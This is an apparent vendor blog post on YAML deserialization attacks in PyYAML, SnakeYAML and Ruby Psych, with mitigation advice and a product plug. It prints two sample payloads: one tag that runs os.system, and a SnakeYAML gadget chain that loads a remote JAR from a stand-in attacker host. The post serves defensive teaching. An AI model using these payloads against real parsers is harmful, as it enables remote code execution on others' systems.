Application Security

YAML Deserialization Attacks and How to Prevent Them

YAML looks innocent but its deserialization features have led to remote code execution in countless applications. Here is why and how to stay safe.

Alex
Security Architect
4 min read

YAML is everywhere -- Kubernetes manifests, CI/CD configurations, application settings, Ansible playbooks, Docker Compose files. Developers love it because it is readable. Attackers love it because many YAML parsers can instantiate arbitrary objects during deserialization, turning a configuration file into a remote code execution vector.

The root problem is that YAML was designed as a data serialization format, not just a configuration format. The YAML specification includes features for representing language-specific data types, object references, and custom tags. These features are powerful for serialization but catastrophic for security when applied to untrusted input.

How YAML Deserialization Attacks Work

Python: The yaml.load() Disaster

In Python, yaml.load() without a Loader argument (or with Loader=yaml.FullLoader or Loader=yaml.UnsafeLoader) can instantiate arbitrary Python objects. A YAML document like this:

!!python/object/apply:os.system ['whoami']

Executes the whoami command when parsed. The !!python/object/apply tag tells PyYAML to call os.system with the provided arguments. Any function in any importable Python module can be called this way.

The fix is to always use yaml.safe_load() instead of yaml.load(). This restricts parsing to basic YAML types (strings, numbers, lists, dictionaries) without any object instantiation.

This vulnerability is so common that Bandit (the Python security linter) has a dedicated check for it (B506). Despite years of awareness, new applications continue to ship with unsafe yaml.load() calls.

Java: SnakeYAML Object Instantiation

SnakeYAML, the most popular Java YAML parser, supports arbitrary object construction through YAML tags. A document containing:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker.com/payload.jar"]]]]

Will cause SnakeYAML to instantiate a ScriptEngineManager that loads a remote JAR file, achieving remote code execution.

CVE-2022-1471 formalized this vulnerability. The fix in SnakeYAML 2.0 is to use the SafeConstructor which, like Python safe_load(), restricts parsing to basic types.

Ruby: Psych and ERB

Ruby YAML parser Psych supports object deserialization through tags. Combined with Ruby ERB template engine, this has been exploited to achieve code execution through crafted YAML documents.

Rails applications that deserialize YAML from user input have been particularly vulnerable. CVE-2013-0156 was a critical Rails vulnerability where YAML deserialization in the XML parameter parser led to remote code execution.

Where YAML Deserialization Vulnerabilities Hide

Configuration files from untrusted sources. Applications that load YAML configuration from user-uploaded files, shared repositories, or network locations are vulnerable if they use unsafe parsing.

API endpoints that accept YAML. Some APIs accept YAML as an alternative to JSON. If the API endpoint uses an unsafe YAML parser, every request is a potential RCE vector.

CI/CD configurations. CI/CD systems parse YAML configurations that may be contributed by users with varying trust levels. A malicious contributor can craft a YAML file that exploits the CI/CD system YAML parser.

Template rendering. Applications that render YAML templates with user-controlled values can be vulnerable if the template output is then parsed with an unsafe loader.

Prevention Strategies

Always use safe loading functions. In Python, use yaml.safe_load(). In Java SnakeYAML 2.x, use new Yaml(new SafeConstructor()). In Ruby, use YAML.safe_load(). This is the single most important mitigation.

Ban unsafe YAML functions in your codebase. Add linting rules (Bandit B506 for Python, Semgrep rules for other languages) that flag any use of unsafe YAML parsing functions. Make these rules build-breaking, not just warnings.

Treat YAML input as untrusted. Even YAML from internal sources should be parsed safely. Configuration files can be modified by compromised systems or malicious insiders.

Consider alternatives to YAML. For configuration files, TOML offers similar readability without the dangerous serialization features. For data exchange, JSON is simpler and has a smaller attack surface. YAML complexity is rarely necessary for configuration.

Validate YAML schema after parsing. Even with safe loading, validate that the parsed data matches your expected schema. Reject unexpected keys, types, or structures.

How Safeguard.sh Helps

Safeguard.sh monitors YAML parsing libraries across your dependency tree. We track vulnerabilities in PyYAML, SnakeYAML, js-yaml, and other YAML parsers, alerting you to critical updates like the SnakeYAML 2.0 SafeConstructor requirement. Our platform also identifies applications that depend on vulnerable YAML parser versions, helping you prioritize remediation before attackers exploit these well-known vectors.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.